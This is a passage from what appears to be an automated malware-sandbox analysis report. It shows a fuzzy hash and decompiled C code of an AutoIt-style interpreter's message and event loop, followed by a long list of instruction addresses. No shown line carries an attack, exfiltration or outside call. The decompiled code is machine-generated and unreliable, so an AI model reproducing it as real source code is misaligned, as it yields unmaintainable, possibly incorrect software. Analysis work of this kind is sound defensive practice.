                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E004091E0(struct tagMSG* __ecx, struct tagMSG* __edx, void* __fp0, signed int _a4) {
				struct tagMSG _v32;
				char _v48;
				char _v64;
				char _v80;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				intOrPtr _v152;
				int _v156;
				char _v164;
				struct tagMSG _v188;
				struct HWND__* _v192;
				int _v196;
				struct HWND__* _v204;
				char _v208;
				struct HWND__* _v220;
				struct tagMSG _v244;
				char _v248;
				char _v252;
				long _v256;
				long _v260;
				struct HWND__* _v264;
				int _v268;
				struct HWND__* _v272;
				signed int _v276;
				char _v277;
				char _v288;
				int _v292;
				struct HWND__* _v300;
				struct HWND__* _v304;
				struct HWND__* _v308;
				struct tagMSG* _v312;
				char _v316;
				long _v324;
				signed int _v328;
				char _v329;
				struct HWND__* _v332;
				struct tagMSG* _v336;
				void* __ebx;
				void* __edi;
				signed int __esi;
				intOrPtr _t280;
				int _t282;
				intOrPtr _t283;
				struct tagMSG* _t285;
				struct HWND__* _t291;
				struct HWND__* _t295;
				intOrPtr* _t297;
				struct HWND__* _t299;
				struct HWND__* _t302;
				struct HWND__* _t307;
				struct HWND__* _t329;
				struct HWND__* _t331;
				struct HWND__* _t336;
				struct HWND__* _t337;
				struct HWND__* _t338;
				struct HWND__* _t342;
				struct HWND__* _t347;
				void* _t349;
				struct HWND__* _t355;
				struct tagMSG* _t358;
				long _t359;
				void* _t368;
				void* _t379;
				void* _t380;
				struct tagMSG* _t384;
				signed int _t385;
				void* _t400;
				signed int _t403;
				void* _t405;
				int _t406;
				void* _t407;
				struct HWND__* _t414;
				int _t415;
				struct HWND__* _t417;
				struct HWND__* _t423;
				intOrPtr _t431;
				struct HWND__* _t437;
				struct HWND__* _t442;
				intOrPtr _t460;
				void* _t462;
				struct tagMSG* _t467;
				signed int _t480;
				struct tagMSG* _t511;
				signed int _t545;
				void* _t549;
				struct tagMSG** _t552;
				struct HWND__** _t553;
				struct tagMSG* _t560;
				struct HWND__* _t564;
				struct HWND__* _t565;
				signed int _t566;
				signed int _t570;
				struct HWND__** _t572;
				void* _t598;

				_t606 = __fp0;
				_t511 = __edx;
				_t471 = __ecx;
				_t572 = (_t570 & 0xfffffff8) - 0x14c;
				_t533 = __ecx;
				_t280 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t280 >= 0xf3c) {
					 *0x4974e2 = 0;
					E0045E737(__fp0, __ecx, 0x9a, 0xffffffff);
					_t282 = 1;
					L33:
					return _t282;
				}
				_t283 = _t280 + 1;
				_v312 = __ecx;
				 *((intOrPtr*)(__ecx + 0xec)) = _t283;
				if(_t283 == 1) {
					E00410940(__ecx, __fp0);
				}
				_t533[0x51] = 0;
				if(_t533[0x3f] != 0) {
					L30:
					_t285 = _t533[0x3b];
					_t533[0x51] = 0;
					if(_t285 == 1) {
						E0040F190(_t471, _t533);
						__eflags = _t533[0x3f] - 1;
						if(__eflags == 0) {
							goto L32;
						}
						E00401A50(_t533, _t511, __eflags, _t606);
						LockWindowUpdate(0);
						DestroyWindow( *0x497518); // executed
						_t291 = GetMessageW( &_v32, 0, 0, 0);
						__eflags = _t291;
						if(_t291 <= 0) {
							goto L32;
						}
						do {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
							_t295 = GetMessageW( &_v32, 0, 0, 0);
							__eflags = _t295;
						} while (_t295 > 0);
						goto L32;
					} else {
						_t533[0x3b] = _t285 - 1;
						L32:
						_t282 = 0;
						goto L33;
					}
				} else {
					while(_t533[0x51] == 0) {
						if( *0x4974e3 != 0) {
							L10:
							if( *0x4a8624 != 0) {
								_t297 =  *0x4a8628; // 0x0
								_t460 =  *_t297;
								E00431D7F();
								_t299 = _t533[0x6c];
								_t545 = 0;
								__eflags = _t299;
								if(_t299 == 0) {
									L80:
									__eflags = _t545 - _t299;
									if(__eflags == 0) {
										goto L11;
									}
									E00465124( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  *((intOrPtr*)(_t533[0x6b] + _t545 * 4)), __eflags, _t533,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  &_v252,  &_v112,  &_v100,  &_v136);
									_t511 = _t533[0x6b];
									_t471 =  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18;
									_v276 =  &(_v276->i);
									E0040E0A0( &(_t533[0x53]),  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18);
									E0047D33E( *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18, _t511, _t606, _t533,  &(_v276->i), 1, 0);
									L29:
									if(_t533[0x3f] == 0) {
										continue;
									}
									goto L30;
								}
								_t471 = _t533[0x6b];
								do {
									_t511 = _t471->hwnd;
									__eflags = _t511->hwnd;
									if(_t511->hwnd == 0) {
										goto L79;
									}
									_t511 = _t511->hwnd;
									__eflags = _t511->hwnd - _t460;
									if(_t511->hwnd == _t460) {
										goto L80;
									}
									L79:
									_t545 = _t545 + 1;
									_t471 =  &(_t471->message);
									__eflags = _t545 - _t533[0x6c];
								} while (_t545 < _t533[0x6c]);
								goto L80;
							}
							L11:
							if( *0x4974ec == 1) {
								__eflags =  *0x4974e3;
								if( *0x4974e3 != 0) {
									goto L12;
								}
								Sleep(0xa);
								goto L29;
							}
							L12:
							if(_t533[0x118] != 0) {
								__eflags =  *0x4a954c;
								if( *0x4a954c != 0) {
									goto L13;
								}
								_t467 = _t533[0x116];
								 *0x4a954c = 1;
								_v308 = 0;
								_v328 = _t467;
								while(1) {
									_t511 =  &_v328;
									 *_t572 = 0;
									_t329 = E00442A55(_t511, _t471);
									__eflags = _t329;
									if(_t329 == 0) {
										goto L93;
									}
									_t347 = _t467->hwnd;
									__eflags =  *((char*)(_t347 + 0x11));
									if( *((char*)(_t347 + 0x11)) != 0) {
										L92:
										_t471 =  &_v324;
										E00440847( &_v328,  &_v324);
										_t467 = _v336;
										continue;
									}
									_v324 = _t347;
									_t349 = E0040C620( *((intOrPtr*)(_t347 + 0x14)));
									__eflags = _t511;
									if(__eflags < 0) {
										goto L92;
									}
									if(__eflags > 0) {
										L91:
										_v308 =  &(_v308->i);
										 *((intOrPtr*)(_t467->hwnd + 0x14)) = timeGetTime();
										E00465124(_t467,  &_v248, __eflags, _t533, _t467,  &_v248,  &_v128,  &_v144,  &_v140);
										_t355 =  &(_v272->i);
										__eflags = _t355;
										_v272 = _t355;
										 *((char*)(_t467->hwnd + 0x10)) = 1;
										E0047D33E(_t467, _t467->hwnd, _t606, _t533, _t355, 1, 0);
										 *((char*)(_t467->hwnd + 0x10)) = 0;
										goto L92;
									}
									__eflags = _t349 -  *((intOrPtr*)(_v324 + 0x18));
									if(__eflags < 0) {
										goto L92;
									}
									goto L91;
								}
								while(1) {
									L93:
									_v328 = _t533[0x116];
									while(1) {
										L94:
										_t471 =  &_v328;
										 *_t572 = 0;
										_t331 = E00442A55( &_v328,  &_v328);
										__eflags = _t331;
										if(_t331 == 0) {
											break;
										}
										_t511 = _v328;
										_t342 = _t511->hwnd;
										__eflags =  *((char*)(_t342 + 0x11));
										if( *((char*)(_t342 + 0x11)) != 0) {
											E004521B3( &(_t533[0x116]),  &_v328);
											L93:
											_v328 = _t533[0x116];
											continue;
										}
										_t471 =  &_v324;
										_t511 =  &_v328;
										E00440847(_t511,  &_v324);
									}
									__eflags = _v308;
									 *0x4a954c = 0;
									if(_v308 > 0) {
										goto L29;
									}
									goto L13;
								}
							}
							L13:
							if( *0x4a863c != 0) {
								__eflags = _t533[0x119] - 1;
								if(_t533[0x119] == 1) {
									goto L14;
								}
								__eflags =  *0x4a8668 - 1;
								if( *0x4a8668 == 1) {
									goto L14;
								}
								E0044C29D( &_v244);
								while(1) {
									_t511 =  &_v244;
									_t302 = E0045178A(0x4a8630, _t511);
									__eflags = _t302;
									if(_t302 == 0) {
										break;
									}
									__eflags = E00436565( &(_v244.message));
									if(__eflags != 0) {
										continue;
									}
									_t307 = E00465124( &_v208, _v244.message, __eflags, _t533, _v244.message,  &_v208,  &_v132,  &_v120,  &_v104);
									__eflags = _t307;
									if(_t307 == 0) {
										continue;
									}
									_v300 = 0;
									_v292 = 1;
									_v288 = 0;
									E00408F40(1,  &_v300);
									_v292 = 1;
									_v300 = _v244.hwnd;
									E00401B10(L"@GUI_CTRLID",  &_v96, __eflags);
									E00401980(2, 1,  &_v300,  &_v96);
									E00402250( &_v96);
									E00408F40(L"@GUI_CTRLID",  &_v300);
									_v292 = 7;
									_v300 = _v244.pt;
									E00401B10(L"@GUI_WINHANDLE",  &_v64, __eflags);
									E00401980(2, 1,  &_v300,  &_v64);
									E00402250( &_v64);
									E00408F40(L"@GUI_WINHANDLE",  &_v300);
									_t536 = L"@GUI_CTRLHANDLE";
									_t559 =  &_v48;
									_v292 = 7;
									_v300 = _v220;
									E00401B10(L"@GUI_CTRLHANDLE",  &_v48, __eflags);
									_t511 =  &_v300;
									E00401980(2, 1, _t511,  &_v48);
									E00402250( &_v48);
									_t560 = _v312;
									 *((char*)(_t560 + 0x464)) = 1;
									E0047D33E(_t559, _t511, _t606, _t560, _v208 + 1, 1, 0);
									 *((char*)(_t560 + 0x464)) = 0;
									_t553 =  &_v316;
									L108:
									E00408F40(_t536, _t553);
									_t471 =  &(_v244.message);
									E00402250( &(_v244.message));
									_t533 = _v312;
									goto L29;
								}
								_t471 =  &(_v244.message);
								E00402250( &(_v244.message));
							}
							L14:
							if(E004091B0(_t511, _t606, _t533) == 1) {
								goto L29;
							}
							if( *0x4a87b0 != 0) {
								__eflags = _t533[0x119] - 1;
								if(_t533[0x119] == 1) {
									goto L16;
								}
								E0044C29D( &_v244);
								while(1) {
									_t511 =  &_v244;
									_t437 = E00453BC6(0x4a8710, _t511);
									__eflags = _t437;
									if(_t437 == 0) {
										break;
									}
									__eflags = E00436565( &(_v244.message));
									if(__eflags != 0) {
										continue;
									}
									_t442 = E00465124( &(_v188.pt), _v244.message, __eflags, _t533, _v244.message,  &(_v188.pt),  &_v108,  &_v124,  &_v116);
									__eflags = _t442;
									if(_t442 == 0) {
										continue;
									}
									_v204 = 0;
									_v196 = 1;
									_v192 = 0;
									E00408F40(1,  &_v204);
									_v196 = 1;
									_t536 = L"@TRAY_ID";
									_v204 = _v244.hwnd;
									E00401B10(L"@TRAY_ID",  &_v80, __eflags);
									_t511 =  &_v204;
									E00401980(2, 1, _t511,  &_v80);
									E00402250( &_v80);
									_t552 = _v312;
									__eflags = _v188.pt + 1;
									_t552[0x119] = 1;
									E0047D33E(_v188.pt + 1, _t511, _t606, _t552, _v188.pt + 1, 1, 0);
									_t552[0x119] = 0;
									_t553 =  &_v220;
									goto L108;
								}
								_t471 =  &(_v244.message);
								E00402250( &(_v244.message));
							}
							L16:
							_t358 = _t533[0x3e];
							if(_t358 == 7) {
								_t511 = _t533[0x114];
								_t359 = WaitForSingleObject(_t511, 0xa);
								_v256 = _t359;
								__eflags = _t359 - 0x102;
								if(_t359 != 0x102) {
									GetExitCodeProcess(_t533[0x114],  &_v256);
									_t511 = _t533[0x114];
									CloseHandle(_t511);
									_v324 = _v256;
									_t471 = _t533 +  *_t533->message;
									E0040D410( &_v324, _t533 +  *_t533->message);
									_t533[0x51] = 1;
									_t533[0x3e] = 0;
								}
								goto L29;
							}
							if(_t358 == 8 || _t358 == 9) {
								Sleep(0xa);
								__eflags = _t533[0x112];
								if(_t533[0x112] == 0) {
									__eflags = 0;
									L127:
									_t511 = _t533[0x10e];
									_t471 =  &_v304;
									E00443D19(_t511,  &_v304,  &_v329);
									_t572 =  &(_t572[3]);
									__eflags = _t533[0x3e] - 9;
									if(_t533[0x3e] != 9) {
										__eflags = _v329 - 1;
										if(_v329 != 1) {
											goto L29;
										}
										_t462 = 0;
										__eflags = 0;
										L133:
										_t368 = _t533[0x115];
										_v260 = 0xcccccccc;
										__eflags = _t368 - _t462;
										if(_t368 != _t462) {
											GetExitCodeProcess(_t368,  &_v260);
											CloseHandle(_t533[0x115]);
											_t533[0x115] = _t462;
										}
										__eflags = _t533[0x3e] - 8;
										if(_t533[0x3e] != 8) {
											_t511 =  *_t533;
											_t471 = _v260;
											__eflags = _t533 + _t511->message;
											E00403CD0(_t533 + _t511->message, _v260, _t462);
										} else {
											asm("fild dword [esp+0x2c]");
											__eflags = _v304;
											if(_v304 < 0) {
												_t606 = _t606 +  *0x48cd18;
											}
											_t511 =  *_t533;
											_v324 = _t606;
											_t471 =  &_v324;
											E004574B4(_t533 + _t511->message,  &_v324);
										}
										_t533[0x51] = 1;
										_t533[0x3e] = _t462;
										Sleep(_t533[0xbd]);
										goto L29;
									}
									__eflags = _v329;
									if(_v329 != 0) {
										_v329 = 0;
										goto L29;
									}
									_v329 = 1;
									goto L133;
								}
								_t379 = E0040C620(_t533[0x113]);
								_t462 = 0;
								__eflags = _t511;
								if(__eflags < 0) {
									goto L127;
								}
								if(__eflags > 0) {
									L123:
									_t380 = _t533[0x115];
									__eflags = _t380 - _t462;
									if(_t380 != _t462) {
										CloseHandle(_t380);
										_t533[0x115] = _t462;
									}
									_t511 =  *_t533;
									_t471 = _t533 + _t511->message;
									_v324 = _t462;
									E0040D410( &_v324, _t533 + _t511->message);
									goto L66;
								}
								__eflags = _t379 - _t533[0x112];
								if(_t379 < _t533[0x112]) {
									goto L127;
								}
								goto L123;
							} else {
								if(_t358 == 2 || _t358 == 3 || _t358 == 4 || _t358 == 5 || _t358 == 6) {
									Sleep(0xa);
									__eflags = _t533[0xbc];
									if(_t533[0xbc] == 0) {
										L56:
										_t384 = _t533[0x3e];
										__eflags = _t384 - 3;
										if(_t384 < 3) {
											goto L29;
										}
										_t385 = _t384 - 3;
										__eflags = _t385 - 3;
										if(__eflags > 0) {
											goto L29;
										} else {
											switch( *((intOrPtr*)(_t385 * 4 +  &M0042E18D))) {
												case 0:
													__eax = E0046F3C1(__ecx, __fp0, __edi, 1);
													goto L149;
												case 1:
													__eax = E0046F3C1(__ecx, __fp0, __edi, 1);
													__esi = __eax;
													__eflags = __esi;
													if(__eflags < 0) {
														goto L150;
													}
													if(__eflags <= 0) {
														goto L153;
													}
													goto L29;
												case 2:
													_t386 = E0046FDBF(__eflags, _t606, _t533);
													L149:
													_t547 = _t386;
													__eflags = _t547;
													if(__eflags >= 0) {
														goto L151;
													}
													goto L150;
												case 3:
													__eax = E0046FDBF(__eflags, __fp0, __edi);
													__esi = __eax;
													__eflags = __esi;
													if(__eflags < 0) {
														L150:
														_t511 =  ~_t547;
														E00403C90(_t533 +  *_t533->message, _t511, 0);
														_t471 = _t533 +  *_t533->message;
														_v332 = 0;
														E0040D410( &_v332, _t533 +  *_t533->message);
														__eflags = _t547;
														L151:
														if(__eflags == 0) {
															goto L29;
														}
														__eflags = _t547;
														if(_t547 <= 0) {
															L156:
															_push(_t533[0xbd]);
															_t533[0x51] = 1;
															_t533[0x3e] = 0;
															E004331A2(_t533[0xbd], _t606);
															_t572 =  &(_t572[1]);
															goto L29;
														}
														L153:
														_t389 = _t533[0x3e];
														__eflags = _t389 - 5;
														if(_t389 == 5) {
															L155:
															_v188.hwnd = 0;
															_v188.wParam = 1;
															_v188.lParam = 0;
															E00408F40(_t533,  &_v188);
															_t471 =  *_t533;
															_t511 = _t533 +  *_t533->message;
															__eflags = _t511;
															_v188.wParam = 7;
															_v188 =  *(_t533[0x76]);
															E004731E1( *_t533, _t511,  &_v188, 0);
															E00408F40(_t533,  &_v188);
															goto L156;
														}
														__eflags = _t389 - 3;
														if(_t389 != 3) {
															goto L156;
														}
														goto L155;
													}
													if(__eflags > 0) {
														goto L29;
													}
													goto L153;
											}
										}
										while(1) {
											L58:
											__eflags = _v244.message - 0x12;
											if(_v244.message == 0x12) {
												break;
											}
											_t471 = 0x4a8630;
											_t336 = E0040D150(0x4a8630,  &_v244);
											__eflags = _t336;
											if(_t336 == 0) {
												_t338 = E0040D170(0x4a8630,  &_v244);
												__eflags = _t338;
												if(_t338 == 0) {
													TranslateMessage( &_v244);
													_t471 =  &_v244;
													DispatchMessageW( &_v244);
												}
											}
											_t511 =  &_v244;
											_t337 = PeekMessageW(_t511, 0, 0, 0, 1);
											__eflags = _t337;
											if(_t337 == 0) {
												L8:
												if( *0x4974e6 == 1) {
													 *0x4974ec = 0;
													 *0x4974e6 = 0;
													_t533[0x3e] = 1;
												}
												if(_t533[0x3e] == 1) {
													_t471 = _t533 +  *_t533->message;
													_v304 = 0;
													E0040D410( &_v304, _t533 +  *_t533->message);
													goto L30;
												} else {
													goto L10;
												}
											} else {
												continue;
											}
										}
										_t533[0x3f] = 1;
										_t533[0x3e] = 1;
										goto L8;
									}
									_t400 = E0040C620(_t533[0xbe]);
									_t471 = 0;
									__eflags = _t511;
									if(__eflags < 0) {
										goto L56;
									}
									_t462 = 0;
									if(__eflags > 0) {
										L65:
										__eflags = _t533[0x3e] - 2;
										if(_t533[0x3e] != 2) {
											_t471 = _t533 +  *_t533->message;
											_v324 = _t462;
											E0040D410( &_v324, _t533 +  *_t533->message);
										}
										L66:
										_t533[0x51] = 1;
										_t533[0x3e] = _t462;
										goto L29;
									}
									__eflags = _t400 - _t533[0xbc];
									if(_t400 >= _t533[0xbc]) {
										goto L65;
									}
									goto L56;
								} else {
									_t480 = _a4;
									_t533[0x3d] = _t480;
									_t403 = _t480;
									_t471 = _t480 + 1;
									_a4 = _t480 + 1;
									_t598 = _t403 -  *0x4a90f8; // 0x0
									if(_t598 > 0 || _t403 <= 0) {
										L160:
										_t533[0x3e] = 1;
										goto L29;
									} else {
										_t405 = (_t403 << 4) +  *0x4a912c;
										if(_t405 == 0) {
											goto L160;
										}
										_t549 = _t405;
										_t471 =  *(_t549 + 4);
										_v328 = 0;
										_t511 =  *( *(_t549 + 4));
										_t406 = _t511->wParam;
										if(_t406 != 0) {
											__eflags = _t406 - 0x34;
											if(__eflags != 0) {
												_t407 = _t406 - 1;
												__eflags = _t407 - 0x7e;
												if(_t407 > 0x7e) {
													L166:
													_t511 = _t511->wParam;
													E0045E737(_t606, _t533, 0x1388, _t511);
													goto L29;
												}
												switch( *((intOrPtr*)(( *(_t407 + 0x409614) & 0x000000ff) * 4 +  &M00409600))) {
													case 0:
														__eax = 0;
														__ecx =  &_v164;
														_v164 = 0;
														_v152 = 0;
														__eax =  &_v328;
														__edx = __esi;
														__ebx = __edi;
														_v156 = 1;
														__eax = E00408CC0( &_v328, __ebx, __esi, __fp0,  &_v164);
														__eflags = __eax;
														if(__eax == 0) {
															__edx =  *(__esi + 4);
															__eax = _v328;
															__eax =  *( *(__esi + 4) + _v328 * 4);
															__eflags =  *((short*)(__eax + 8)) - 0x7f;
															if( *((short*)(__eax + 8)) != 0x7f) {
																__ecx =  *((short*)(__eax + 0xa));
																__eax = E0045E737(__fp0, __edi, 0x72,  *((short*)(__eax + 0xa)));
															}
														}
														__esi =  &_v164;
														__eax = E00408F40(__edi, __esi);
														goto L29;
													case 1:
														E00408FC0(_t549, _t606, _t533);
														goto L29;
													case 2:
														__ebx = __edi + 0x488;
														__eax = E00432416(__ebx);
														__eflags = __al;
														if(__al != 0) {
															__eax =  &_v328;
															__eax = E0047FAAE(__fp0, __edi, __esi,  &_v328, __ebx);
															__eflags = __eax;
															if(__eax != 0) {
																__ecx =  *(__esi + 4);
																__edx = _v328;
																__eax =  *( *(__esi + 4) + _v328 * 4);
																__ecx =  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa));
																__eax = E0045E737(__fp0, __edi, 0xaa,  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa)));
															}
														} else {
															__edx =  *((short*)(__edx + 0xa));
															__eax = E0045E737(__fp0, __edi, 0xa7, __edx);
														}
														goto L29;
													case 3:
														goto L29;
													case 4:
														goto L166;
												}
											}
											_t471 =  &_v276;
											_v276 = 0;
											_v268 = 1;
											_v264 = 0;
											_t414 = E004096A0( &_v328, __eflags, _t606, _t533, _t549,  &_v276,  &_v277);
											__eflags = _t414;
											if(_t414 != 0) {
												L37:
												_t564 = _v264;
												__eflags = _t564;
												if(_t564 != 0) {
													 *( *(_t564 + 0xc)) =  *( *(_t564 + 0xc)) - 1;
													_t511 =  *(_t564 + 0xc);
													__eflags = _t511->hwnd;
													if(_t511->hwnd == 0) {
														_push(_t564->i);
														E004111DC();
														_t471 =  *(_t564 + 0xc);
														_push( *(_t564 + 0xc));
														E004111DC();
														_t572 =  &(_t572[2]);
													}
													_push(_t564);
													E004111DC();
													_t572 =  &(_t572[1]);
													_v264 = 0;
												}
												_t415 = _v268;
												__eflags = _t415 - 8;
												if(_t415 == 8) {
													_t565 = _v276;
													__eflags = _t565;
													if(_t565 != 0) {
														__imp__#9(_t565);
														_push(_t565);
														E004111DC();
														_t572 =  &(_t572[1]);
													}
												} else {
													__eflags = _t415 - 0xa;
													if(_t415 == 0xa) {
														_t417 = _v276;
														__eflags = _t417;
														if(_t417 != 0) {
															E0044318E(_t417);
														}
													} else {
														__eflags = _t415 - 5;
														if(_t415 == 5) {
															E0040E270( &_v276, _t564);
														} else {
															__eflags = _t415 - 0xb;
															if(_t415 == 0xb) {
																_t566 = _v276;
																_t511 =  *(_t566 + 4);
																_push(_t511);
																E004111DC();
																_push(_t566);
																E004111DC();
																_t572 =  &(_t572[2]);
															} else {
																__eflags = _t415 - 0xc;
																if(_t415 == 0xc) {
																	_t423 = _v276;
																	__eflags = _t423;
																	if(_t423 != 0) {
																		E0044B3D9(_t423);
																	}
																}
															}
														}
													}
												}
												goto L29;
											}
											_t511 =  *(_t549 + 4);
											_t431 =  *((intOrPtr*)(_t511 + _v328 * 4));
											__eflags =  *((short*)(_t431 + 8)) - 0x7f;
											if( *((short*)(_t431 + 8)) != 0x7f) {
												_t471 =  *((short*)(_t431 + 0xa));
												E0045E737(_t606, _t533, 0x72,  *((short*)(_t431 + 0xa)));
												E00408F40(_t533,  &_v288);
												goto L29;
											}
											goto L37;
										} else {
											E0040AFA0(_t606, _t533, _t549,  &_a4); // executed
											goto L29;
										}
									}
								}
							}
						}
						if( *0x4a8668 != 0) {
							__eflags = _t533[0x3e];
							if(_t533[0x3e] == 0) {
								goto L10;
							}
						}
						if(PeekMessageW( &_v244, 0, 0, 0, 1) != 0) {
							goto L58;
						}
						goto L8;
					}
					goto L30;
				}
			}












































































































                                  0x004091e0
                                  0x004091e0
                                  0x004091e0
                                  0x004091e6
                                  0x004091ef
                                  0x004091f1
                                  0x004091fc
                                  0x0042d7b5
                                  0x0042d7bc
                                  0x0042d7c1
                                  0x004093a5
                                  0x004093ab
                                  0x004093ab
                                  0x00409202
                                  0x00409203
                                  0x00409207
                                  0x00409210
                                  0x00409582
                                  0x00409582
                                  0x0040921d
                                  0x00409224
                                  0x00409386
                                  0x00409386
                                  0x0040938c
                                  0x00409396
                                  0x004095ad
                                  0x004095b2
                                  0x004095b9
                                  0x00000000
                                  0x00000000
                                  0x004095c1
                                  0x004095c8
                                  0x004095d5
                                  0x004095ef
                                  0x004095f1
                                  0x004095f3
                                  0x00000000
                                  0x00000000
                                  0x0042e158
                                  0x0042e160
                                  0x0042e16e
                                  0x0042e182
                                  0x0042e184
                                  0x0042e184
                                  0x00000000
                                  0x0040939c
                                  0x0040939d
                                  0x004093a3
                                  0x004093a3
                                  0x00000000
                                  0x004093a3
                                  0x00409230
                                  0x00409230
                                  0x00409244
                                  0x0040928a
                                  0x00409291
                                  0x0042d810
                                  0x0042d815
                                  0x0042d817
                                  0x0042d81c
                                  0x0042d822
                                  0x0042d824
                                  0x0042d826
                                  0x0042d853
                                  0x0042d853
                                  0x0042d855
                                  0x00000000
                                  0x00000000
                                  0x0042d888
                                  0x0042d88d
                                  0x0042d89c
                                  0x0042d8a7
                                  0x0042d8ab
                                  0x0042d8b6
                                  0x00409379
                                  0x00409380
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409380
                                  0x0042d82c
                                  0x0042d832
                                  0x0042d832
                                  0x0042d834
                                  0x0042d837
                                  0x00000000
                                  0x00000000
                                  0x0042d83d
                                  0x0042d83f
                                  0x0042d841
                                  0x00000000
                                  0x00000000
                                  0x0042d847
                                  0x0042d847
                                  0x0042d848
                                  0x0042d84b
                                  0x0042d84b
                                  0x00000000
                                  0x0042d832
                                  0x00409297
                                  0x0040929e
                                  0x0042d8c0
                                  0x0042d8c7
                                  0x00000000
                                  0x00000000
                                  0x0042d8cf
                                  0x00000000
                                  0x0042d8cf
                                  0x004092a4
                                  0x004092ab
                                  0x0042d8da
                                  0x0042d8e1
                                  0x00000000
                                  0x00000000
                                  0x0042d8e7
                                  0x0042d8ed
                                  0x0042d8f4
                                  0x0042d8fc
                                  0x0042d900
                                  0x0042d901
                                  0x0042d905
                                  0x0042d90d
                                  0x0042d912
                                  0x0042d914
                                  0x00000000
                                  0x00000000
                                  0x0042d91a
                                  0x0042d91c
                                  0x0042d920
                                  0x0042d9a4
                                  0x0042d9a4
                                  0x0042d9ae
                                  0x0042d9b3
                                  0x00000000
                                  0x0042d9b3
                                  0x0042d929
                                  0x0042d92d
                                  0x0042d932
                                  0x0042d934
                                  0x00000000
                                  0x00000000
                                  0x0042d93a
                                  0x0042d94d
                                  0x0042d94d
                                  0x0042d959
                                  0x0042d97f
                                  0x0042d98c
                                  0x0042d98c
                                  0x0042d991
                                  0x0042d995
                                  0x0042d999
                                  0x0042d9a0
                                  0x00000000
                                  0x0042d9a0
                                  0x0042d944
                                  0x0042d947
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042d947
                                  0x0042d9bc
                                  0x0042d9bc
                                  0x0042d9c2
                                  0x0042d9c6
                                  0x0042d9c6
                                  0x0042d9c7
                                  0x0042d9cb
                                  0x0042d9d3
                                  0x0042d9d8
                                  0x0042d9da
                                  0x00000000
                                  0x00000000
                                  0x0042d9e0
                                  0x0042d9e4
                                  0x0042d9e6
                                  0x0042d9ea
                                  0x0042da0d
                                  0x0042d9bc
                                  0x0042d9c2
                                  0x00000000
                                  0x0042d9c2
                                  0x0042d9f0
                                  0x0042d9f5
                                  0x0042d9fa
                                  0x0042d9fa
                                  0x0042da14
                                  0x0042da19
                                  0x0042da20
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042da26
                                  0x0042d9bc
                                  0x004092b1
                                  0x004092b8
                                  0x0042da2b
                                  0x0042da32
                                  0x00000000
                                  0x00000000
                                  0x0042da38
                                  0x0042da3f
                                  0x00000000
                                  0x00000000
                                  0x0042da4a
                                  0x0042da4f
                                  0x0042da4f
                                  0x0042da59
                                  0x0042da5e
                                  0x0042da60
                                  0x00000000
                                  0x00000000
                                  0x0042da70
                                  0x0042da72
                                  0x00000000
                                  0x00000000
                                  0x0042da9a
                                  0x0042da9f
                                  0x0042daa1
                                  0x00000000
                                  0x00000000
                                  0x0042daae
                                  0x0042dab2
                                  0x0042dab6
                                  0x0042daba
                                  0x0042dac3
                                  0x0042dad3
                                  0x0042dad7
                                  0x0042dae6
                                  0x0042daed
                                  0x0042daf6
                                  0x0042db0b
                                  0x0042db13
                                  0x0042db17
                                  0x0042db26
                                  0x0042db2d
                                  0x0042db36
                                  0x0042db42
                                  0x0042db47
                                  0x0042db4e
                                  0x0042db56
                                  0x0042db5a
                                  0x0042db65
                                  0x0042db69
                                  0x0042db70
                                  0x0042db7c
                                  0x0042db86
                                  0x0042db8d
                                  0x0042db92
                                  0x0042db98
                                  0x0042dc2f
                                  0x0042dc2f
                                  0x0042dc34
                                  0x0042dc38
                                  0x0042dc3d
                                  0x00000000
                                  0x0042dc3d
                                  0x0042dc46
                                  0x0042dc4a
                                  0x0042dc4a
                                  0x004092be
                                  0x004092c6
                                  0x00000000
                                  0x00000000
                                  0x004092d3
                                  0x0042dc54
                                  0x0042dc5b
                                  0x00000000
                                  0x00000000
                                  0x0042dc66
                                  0x0042dc6b
                                  0x0042dc6b
                                  0x0042dc75
                                  0x0042dc7a
                                  0x0042dc7c
                                  0x00000000
                                  0x00000000
                                  0x0042dc8c
                                  0x0042dc8e
                                  0x00000000
                                  0x00000000
                                  0x0042dcb6
                                  0x0042dcbb
                                  0x0042dcbd
                                  0x00000000
                                  0x00000000
                                  0x0042dbaf
                                  0x0042dbb6
                                  0x0042dbbd
                                  0x0042dbc4
                                  0x0042dbcd
                                  0x0042dbd4
                                  0x0042dbe0
                                  0x0042dbe7
                                  0x0042dbf2
                                  0x0042dbf9
                                  0x0042dc00
                                  0x0042dc0c
                                  0x0042dc13
                                  0x0042dc16
                                  0x0042dc1d
                                  0x0042dc22
                                  0x0042dc28
                                  0x00000000
                                  0x0042dc28
                                  0x0042dcc4
                                  0x0042dcc8
                                  0x0042dcc8
                                  0x004092d9
                                  0x004092d9
                                  0x004092e2
                                  0x0042dcd2
                                  0x0042dcdb
                                  0x0042dce1
                                  0x0042dce5
                                  0x0042dcea
                                  0x0042dcfc
                                  0x0042dd02
                                  0x0042dd09
                                  0x0042dd18
                                  0x0042dd1c
                                  0x0042dd22
                                  0x0042dd27
                                  0x0042dd2e
                                  0x0042dd2e
                                  0x00000000
                                  0x0042dcea
                                  0x004092eb
                                  0x0042dd3f
                                  0x0042dd45
                                  0x0042dd4c
                                  0x0042ddaf
                                  0x0042ddb1
                                  0x0042ddb1
                                  0x0042ddbc
